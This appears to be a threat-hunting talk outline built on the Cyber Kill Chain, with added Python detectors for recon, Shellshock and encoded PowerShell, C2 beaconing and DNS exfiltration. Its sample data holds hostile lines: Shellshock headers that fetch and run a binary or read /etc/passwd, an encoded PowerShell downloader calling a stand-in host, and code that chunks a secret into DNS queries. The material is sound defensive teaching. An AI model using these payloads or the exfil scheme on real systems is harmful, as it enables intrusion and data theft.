
Threat Hunting with Cyber Kill Chain


My talk on Threat Hunting using Cyber Kill Chain model



  1. Threat Hunting using Cyber Kill Chain Model - Suwitcha Musijaral
  2. About me: System engineer - Mainframe, Windows NT Server, UNIX System V, C programmer. Security engineer - IDS/IPS, WAF, ADC, SSL, NAC. CISSP, CISA, GWAPT, SnortCP, failed OSCP test. Security Architect - Tenable
  3. Red vs Blue (image slide) https://en.wikipedia.org/wiki/Blue_Man_Group https://www.pop-addiction.com/pt-pt/produto/hellboy-hellboy-in-bprd-tee-funko-pop-vinyl-figure/
  4. Cyber Kill Chain: published in 2011 by Lockheed Martin Corp (8 years ago); adapted from the US military targeting process Find, Fix, Track, Target, Engage and Assess (F2T2EA). https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf
  5. (figure from the Lockheed Martin white paper) https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf
  6. LM Cyber Kill Chain: Reconnaissance, Weaponisation, Delivery, Exploitation, Installation, Command & Control, Action (Actions on Objectives)
  7. Reconnaissance (image slide)
  8. Reconnaissance (image slide)
  9. Reconnaissance - source: https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/
  10. Detect Reconnaissance: suspicious access to the corporate web site (country/region/time); high volume on some pages; https://haveibeenpwned.com/DomainSearch; "7 days before weaponised" (Tenable Research)
  11. Detect Reconnaissance: suspicious access to the corporate web site (country/region/time); high volume on some pages; https://haveibeenpwned.com/DomainSearch
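The two "Detect Reconnaissance" slides list what to look for in web server logs: access at unusual times or from unexpected regions, and unusual volume on a few pages (staff and careers pages are what an attacker harvests names from). The following is an added example, not code from the talk, that runs those checks over constructed access-log lines in Apache/nginx combined format. The business-hours window, the thresholds, the scripted user-agent list and the IP addresses are assumptions; the country/region check needs a GeoIP lookup and is deliberately left out so the example runs offline.

```python
"""Hunt for reconnaissance in web server access logs.

Added example for the "Detect Reconnaissance" slides; not code from the
original deck. Log lines are constructed. The business-hours window (UTC),
the thresholds and the scripted user-agent list are assumptions to tune.
"""
import re
from collections import Counter
from datetime import datetime

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Clients that are almost never a browsing human (assumption; extend for your site).
SCRIPTED_UA_RE = re.compile(r"python-requests|curl/|wget/|go-http-client|libwww-perl|nikto|masscan", re.I)

# Constructed sample: one scripted client crawling people pages at 03:00 UTC, plus normal browsing.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2019:03:01:10 +0000] "GET /about/team HTTP/1.1" 200 5120 "-" "python-requests/2.21.0"
203.0.113.7 - - [12/May/2019:03:01:11 +0000] "GET /about/team?page=2 HTTP/1.1" 200 4900 "-" "python-requests/2.21.0"
203.0.113.7 - - [12/May/2019:03:01:12 +0000] "GET /about/team?page=3 HTTP/1.1" 200 4870 "-" "python-requests/2.21.0"
203.0.113.7 - - [12/May/2019:03:01:13 +0000] "GET /careers HTTP/1.1" 200 3300 "-" "python-requests/2.21.0"
203.0.113.7 - - [12/May/2019:03:01:14 +0000] "GET /careers/it-security-engineer HTTP/1.1" 200 2800 "-" "python-requests/2.21.0"
203.0.113.7 - - [12/May/2019:03:01:15 +0000] "GET /contact HTTP/1.1" 200 1900 "-" "python-requests/2.21.0"
198.51.100.20 - - [12/May/2019:10:15:02 +0000] "GET / HTTP/1.1" 200 7100 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/66.0"
198.51.100.20 - - [12/May/2019:10:15:09 +0000] "GET /products HTTP/1.1" 200 6200 "https://example.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/66.0"
198.51.100.21 - - [12/May/2019:14:40:31 +0000] "GET /about/team HTTP/1.1" 200 5120 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) Safari/605.1.15"
198.51.100.22 - - [12/May/2019:19:30:00 +0000] "POST /login HTTP/1.1" 302 0 "https://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) Chrome/74.0.3729.131"
"""


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e.pop("time"), "%d/%b/%Y:%H:%M:%S %z")
        e["page"] = e["path"].split("?", 1)[0]   # group by page, ignore the query string
        entries.append(e)
    return entries


def high_volume_sources(entries, threshold=5):
    """Client IPs with at least `threshold` requests in the window."""
    counts = Counter(e["ip"] for e in entries)
    return {ip: n for ip, n in counts.items() if n >= threshold}


def hot_pages(entries, threshold=3):
    """Pages requested at least `threshold` times; compare against the site's normal profile."""
    counts = Counter(e["page"] for e in entries)
    return {page: n for page, n in counts.items() if n >= threshold}


def off_hours_sources(entries, start_hour=8, end_hour=18):
    """Requests per client outside the expected business window (hours in the log's own timezone)."""
    return Counter(e["ip"] for e in entries if not start_hour <= e["ts"].hour < end_hour)


def scripted_clients(entries):
    """Client IPs whose user agent looks like a tool rather than a browser."""
    return sorted({e["ip"] for e in entries if SCRIPTED_UA_RE.search(e["ua"])})


def hunt(text):
    """Run all recon checks and return one report dict for the analyst."""
    entries = parse_log(text)
    return {
        "high_volume": high_volume_sources(entries),
        "hot_pages": hot_pages(entries),
        "off_hours": dict(off_hours_sources(entries)),
        "scripted": scripted_clients(entries),
    }


if __name__ == "__main__":
    for name, result in hunt(SAMPLE_LOG).items():
        print(f"{name}: {result}")
```

The same IP surfacing in three of the four lists is the signal to pivot on: pull every request from that address, then check whether the harvested names reappear a few days later as phishing targets or as credentials in a breach dump.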
  12. LM Cyber Kill Chain: Reconnaissance, Weaponisation, Delivery, Exploitation, Installation, Command & Control, Action
  13. Weaponised (image slide)
  14. Weaponised - https://support.umbrella.com/hc/en-us/articles/235911828-Newly-Seen-Domains-Security-Category
  15. Weaponised - https://www.flashpoint-intel.com/blog/wipro-threat-actors-active-since-2015/
  16. Detecting Weaponised: research + research - security community, Exploit-DB, Twitter; zero-day exploit? (image: Sun Tzu bamboo book) https://en.wikipedia.org/wiki/Sun_Tzu#/media/File:Bamboo_book_-_binding_-_UCR.jpg
  17. Detecting Weaponised (image slide)
  18. LM Cyber Kill Chain: Reconnaissance, Weaponisation, Delivery, Exploitation, Installation, Command & Control, Action
  19. Delivery (image slide)
  20. Delivery (image slide)
  21. Detecting Delivery: understand the role of each technology; know each technology's limitations; no silver bullet!
  22. Detecting Delivery (image slide)
  23. LM Cyber Kill Chain: Reconnaissance, Weaponisation, Delivery, Exploitation, Installation, Command & Control, Action
  24. Exploitation - https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
  25. Exploitation - https://www.cnet.com/news/equifaxs-hack-one-year-later-a-look-back-at-how-it-happened-and-whats-changed/
  26. Detecting Exploitation - https://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-logs
  27. Detecting Exploitation - https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html
  28. Detecting Exploitation - http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
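Slides 26 and 27 point at two places where exploitation leaves a trace: a web server log, where a Shellshock attempt shows up as the bash function prefix `() { ...;};` inside a logged header, and Windows process-creation events, which only become useful for PowerShell hunting once command-line auditing is switched on. The block below is an added example, not code from the talk, that applies both checks to constructed log lines and constructed 4688-style events. The keyword list for PowerShell is a starting point, not a complete signature set, and the IP addresses and payload are made up.

```python
"""Hunt for exploitation in web access logs and Windows process-creation events.

Added example for the "Detecting Exploitation" slides (Shellshock in logs,
command-line process auditing, malicious PowerShell); not code from the
original deck. All log lines, events and the payload are constructed.
"""
import base64
import re

# Shellshock (CVE-2014-6271): the bash function-definition prefix "() { ...;};"
# arrives in an HTTP header (User-Agent, Referer, Cookie) and is logged verbatim.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Constructed access-log lines; two carry the prefix in User-Agent and Referer.
WEB_LOG = """\
203.0.113.9 - - [26/Sep/2014:08:12:43 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 1234 "-" "() { :;}; /bin/bash -c \\"wget http://203.0.113.9/x -O /tmp/x; chmod +x /tmp/x; /tmp/x\\""
198.51.100.5 - - [26/Sep/2014:08:13:02 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
203.0.113.9 - - [26/Sep/2014:08:14:10 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 1234 "() { ignored; }; echo; /bin/cat /etc/passwd" "Mozilla/5.0"
"""


def find_shellshock(log_text):
    """Return (client_ip, payload_from_prefix_onwards) for every line carrying the prefix."""
    hits = []
    for line in log_text.splitlines():
        m = SHELLSHOCK_RE.search(line)
        if m:
            hits.append((line.split(" ", 1)[0], line[m.start():]))
    return hits


# PowerShell accepts any unambiguous prefix of -EncodedCommand; attackers use the short ones.
ENCODED_FLAG_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS_PS_RE = re.compile(
    r"IEX\b|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient|FromBase64String|"
    r"Invoke-WebRequest|-nop\b|-noni\b|-w(?:indowstyle)?\s+hidden|-exec\w*\s+bypass",
    re.I,
)

# Constructed downloader one-liner, encoded exactly as -EncodedCommand expects (UTF-16LE, base64).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/s.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

# Constructed 4688 events as (EventID, New Process Name, Process Command Line);
# the third field only exists when "Include command line in process creation events" is enabled.
PROCESS_EVENTS = [
    ("4688", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc " + ENCODED),
    ("4688", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\Inventory.ps1"),
    ("4688", r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\alice\notes.txt"),
]


def decode_encoded_command(cmdline):
    """Return (cmdline without the base64 blob, decoded payload or None)."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return cmdline, None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline, None
    # Drop the blob so keyword matching runs on the decoded text, not on base64 noise.
    return cmdline[:m.start()] + cmdline[m.end():], decoded


def score_powershell(cmdline):
    """Score one command line: one point for an encoded command, one per distinct suspicious keyword."""
    text, decoded = decode_encoded_command(cmdline)
    reasons = ["encoded command"] if decoded is not None else []
    if decoded is not None:
        text = text + " " + decoded
    reasons += sorted({m.group(0).lower() for m in SUSPICIOUS_PS_RE.finditer(text)})
    return len(reasons), decoded, reasons


def hunt_process_events(events, min_score=2):
    """Return PowerShell launches whose score reaches `min_score` (threshold is an assumption)."""
    findings = []
    for event_id, image, cmdline in events:
        if event_id != "4688" or not image.lower().endswith("powershell.exe"):
            continue
        score, decoded, reasons = score_powershell(cmdline)
        if score >= min_score:
            findings.append({"cmdline": cmdline, "decoded": decoded, "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    print(find_shellshock(WEB_LOG))
    for f in hunt_process_events(PROCESS_EVENTS):
        print(f["score"], f["reasons"], f["decoded"])
```

Decoding the payload before matching matters: the base64 blob itself contains none of the keywords, so a rule that only inspects the raw command line sees `-enc` and nothing else. The administrative `-ExecutionPolicy RemoteSigned -File` launch scores zero, which is the point of scoring rather than alerting on every `powershell.exe`.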
  29. LM Cyber Kill Chain: Reconnaissance, Weaponisation, Delivery, Exploitation, Installation, Command & Control, Action
  30. Installation - https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
  31. Installation - https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness
  32. Device Secure Boot - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190513-secureboot
  33. Detect Installation - https://www.cisco.com/c/dam/en/us/products/collateral/security/fireamp-endpoints/datasheet-c78-733181.docx/_jcr_content/renditions/datasheet-c78-733181_1.jpg
  34. LM Cyber Kill Chain: Reconnaissance, Weaponisation, Delivery, Exploitation, Installation, Command & Control, Action
  35. Command & Control - https://blog.talosintelligence.com/2017/05/wannacry.html
  36. Command & Control - https://blog.talosintelligence.com/2017/07/the-medoc-connection.html
  37. Detecting C&C - https://isc.sans.edu/suspicious_domains.html#search
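Slide 37 points at the SANS ISC suspicious-domain list, and slide 14 at the "newly seen domains" idea: a domain that nobody in the organisation has ever resolved before is worth a second look. The block below is an added example, not code from the talk, that runs three C2 checks over a constructed resolver log: a match against a blocklist in the ISC one-domain-per-line style, a newly-seen check against a constructed baseline of previously resolved domains, and a beaconing check for a client that resolves the same domain at a near-constant interval. The domains, addresses, baseline and jitter threshold are assumptions, and the two-label "registered domain" shortcut stands in for a proper public-suffix-list lookup.

```python
"""Hunt for command-and-control in DNS query logs.

Added example for the "Detecting C&C" and "Newly Seen Domains" slides; not code
from the original deck. The query log, the blocklist and the "seen before"
baseline are constructed. A real hunt would load the ISC feed
(https://isc.sans.edu/suspicious_domains.html) and a baseline built from the
resolver's own history, and would use the public suffix list instead of the
two-label shortcut used here.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed resolver log: "<UTC time> <client> <qtype> <qname>".
DNS_LOG = """\
2019-05-12T10:00:00Z 10.0.0.15 A www.example.com
2019-05-12T10:00:05Z 10.0.0.15 A api.example.com
2019-05-12T10:01:00Z 10.0.0.23 A badhost.example.org
2019-05-12T10:02:00Z 10.0.0.15 A cdn-sync.example.net
2019-05-12T10:07:00Z 10.0.0.15 A cdn-sync.example.net
2019-05-12T10:12:00Z 10.0.0.15 A cdn-sync.example.net
2019-05-12T10:17:00Z 10.0.0.15 A cdn-sync.example.net
2019-05-12T10:22:00Z 10.0.0.15 A cdn-sync.example.net
2019-05-12T10:03:00Z 10.0.0.23 A mail.example.com
2019-05-12T10:30:00Z 10.0.0.23 A www.example.org
"""

# Constructed blocklist, one domain per line with '#' comments (same shape as the ISC feed).
SUSPICIOUS_DOMAINS = """\
# constructed entries for the example; not a real feed
badhost.example.org
c2.example.invalid
"""

# Registered domains this resolver had already seen before today (constructed baseline).
SEEN_BEFORE = {"example.com", "example.org"}


def registered_domain(qname):
    """Approximate the registrable domain as the last two labels (assumption: no PSL)."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def load_blocklist(text):
    """Parse a one-domain-per-line list, skipping blanks and '#' comments."""
    return {line.strip().lower() for line in text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")}


def parse_dns_log(text):
    """Parse the constructed log format into dicts with a datetime and a normalised qname."""
    records = []
    for line in text.splitlines():
        ts, client, qtype, qname = line.split()
        records.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                        "client": client, "qtype": qtype,
                        "qname": qname.lower().rstrip(".")})
    return records


def blocklist_hits(records, blocklist):
    """Queries whose name, or any parent domain of it, is on the blocklist."""
    hits = []
    for r in records:
        labels = r["qname"].split(".")
        parents = {".".join(labels[i:]) for i in range(len(labels) - 1)}
        if parents & blocklist:
            hits.append((r["client"], r["qname"]))
    return hits


def newly_seen_domains(records, seen_before):
    """Registered domains queried in this log that the resolver had never seen before."""
    return {registered_domain(r["qname"]) for r in records} - seen_before


def beacon_candidates(records, min_queries=4, max_jitter=0.1):
    """(client, registered domain) pairs queried at near-constant intervals; value is the mean gap in seconds."""
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["client"], registered_domain(r["qname"]))].append(r["ts"])
    out = {}
    for pair, times in by_pair.items():
        if len(times) < min_queries:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:   # low relative jitter == timer-driven
            out[pair] = avg
    return out


def hunt(log_text=DNS_LOG, blocklist_text=SUSPICIOUS_DOMAINS, seen_before=SEEN_BEFORE):
    records = parse_dns_log(log_text)
    return {"blocklist": blocklist_hits(records, load_blocklist(blocklist_text)),
            "newly_seen": newly_seen_domains(records, seen_before),
            "beacons": beacon_candidates(records)}


if __name__ == "__main__":
    for name, result in hunt().items():
        print(f"{name}: {result}")
```

The blocklist match is the only one of the three that is an indicator in itself; the other two are leads. A newly seen domain that is also beaconing every five minutes from one workstation is the lead to chase first.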
  38. LM Cyber Kill Chain: Reconnaissance, Weaponisation, Delivery, Exploitation, Installation, Command & Control, Action
  39. Action - https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
  40. Action - https://www.darknet.org.uk/2016/09/det-data-exfiltration-toolkit/
  41. Action - https://blogs.akamai.com/2017/09/introduction-to-dns-data-exfiltration.html
  42. Detecting Action - https://www.cisco.com/c/en/us/solutions/collateral/enterprise-networks/enterprise-network-security/white-paper-c11-736595.html
  43. Detecting Action (image slide)
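Slides 40 and 41 cover exfiltration over DNS: a tool encodes the stolen data, splits it into chunks and sends each chunk as a query for a label under a domain the attacker controls, where the authoritative server reassembles it. The block below is an added example, not code from the talk or from the tools named on the slides. It constructs that traffic for a made-up secret, shows what the receiving side does to rebuild it, and then hunts for it in a constructed resolver log using the signals that survive encoding: many distinct subdomains under one domain, unusually long labels, and labels that are pure hex. The secret, domains, addresses and thresholds are assumptions.

```python
"""Hunt for data exfiltration over DNS (the Action phase of the kill chain).

Added example for the "Action" / "Detecting Action" slides; not code from the
original deck or from any exfiltration tool. The "exfil" queries carry
hex-encoded chunks of a constructed string under a made-up attacker domain;
thresholds and the two-label registered-domain shortcut are assumptions.
"""
import re
from collections import defaultdict

# Constructed secret, chunked the way a DNS exfil tool does it: <hex chunk>.<seq>.<attacker domain>
SECRET = b"ACME customer export: alice@example.com,bob@example.com,carol@example.com"
CHUNK = 30                                    # hex chars per label (assumption; max label is 63)
HEX = SECRET.hex()
EXFIL_QUERIES = [f"{HEX[i:i + CHUNK]}.{i // CHUNK:04x}.data.example.net"
                 for i in range(0, len(HEX), CHUNK)]

# Constructed resolver log as (client, qtype, qname), exfil mixed with normal traffic.
DNS_QUERIES = [("10.0.0.15", "A", q) for q in EXFIL_QUERIES] + [
    ("10.0.0.15", "A", "www.example.com"),
    ("10.0.0.23", "A", "mail.example.com"),
    ("10.0.0.23", "TXT", "_dmarc.example.com"),
    ("10.0.0.23", "A", "static-eu-west-1.cdn.example.org"),
]

HEX_LABEL_RE = re.compile(r"^[0-9a-f]{16,}$")   # a label that is nothing but encoded bytes


def split_name(qname):
    """Return (subdomain labels, registered domain); two-label shortcut, no public suffix list."""
    labels = qname.lower().rstrip(".").split(".")
    return labels[:-2], ".".join(labels[-2:])


def reassemble_hex(queries, domain):
    """What the attacker's authoritative server does: order chunks by <seq> and decode."""
    chunks = {}
    for _client, _qtype, qname in queries:
        sub, dom = split_name(qname)
        if dom == domain and len(sub) >= 2 and HEX_LABEL_RE.match(sub[0]):
            chunks[int(sub[1], 16)] = sub[0]
    return bytes.fromhex("".join(chunks[k] for k in sorted(chunks)))


def hunt_dns_exfil(queries, min_unique=4, min_label=20):
    """Aggregate per (client, registered domain) and report exfil-like patterns with reasons.

    Each exfil query must carry new data, so the count of distinct subdomains under
    one domain grows with every chunk; long and pure-hex labels are the encoding
    showing through. Long labels alone also occur in CDN names, so the reasons are
    returned for triage rather than collapsed into a single verdict.
    """
    stats = defaultdict(lambda: {"unique": set(), "max_label": 0, "hex_labels": 0, "bytes": 0})
    for client, _qtype, qname in queries:
        sub, domain = split_name(qname)
        s = stats[(client, domain)]
        s["unique"].add(".".join(sub))
        for label in sub:
            s["max_label"] = max(s["max_label"], len(label))
            s["hex_labels"] += bool(HEX_LABEL_RE.match(label))
            s["bytes"] += len(label)                 # subdomain bytes carried to that domain
    findings = {}
    for key, s in stats.items():
        reasons = []
        if len(s["unique"]) >= min_unique:
            reasons.append(f"{len(s['unique'])} distinct subdomains")
        if s["max_label"] >= min_label:
            reasons.append(f"label of {s['max_label']} chars")
        if s["hex_labels"]:
            reasons.append(f"{s['hex_labels']} hex-encoded labels")
        if reasons:
            findings[key] = {"reasons": reasons, "bytes": s["bytes"]}
    return findings


if __name__ == "__main__":
    for (client, domain), f in hunt_dns_exfil(DNS_QUERIES).items():
        print(f"{client} -> {domain}: {f['bytes']} bytes; {', '.join(f['reasons'])}")
    print(reassemble_hex(DNS_QUERIES, "example.net"))
```

Real tools vary the encoding (base32, base64 variants) and the record type (TXT, NULL, CNAME), so the hex rule is one instance of a charset check rather than the check; the distinct-subdomain count per domain is the signal that does not depend on the encoding, which is why it is computed first.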
  44. LM Cyber Kill Chain: Reconnaissance, Weaponisation, Delivery, Exploitation, Installation, Command & Control, Action
  45. MITRE ATT&CK - https://attack.mitre.org/resources/enterprise-introduction/
  46. AT&T Cyber Kill Chain - https://www.alienvault.com/blogs/security-essentials/the-internal-cyber-kill-chain-model
  47. Indicator of Compromise - https://blog.talosintelligence.com/2017/05/wannacry.html#more
  48. Thank you - suwitcha@gmail.com
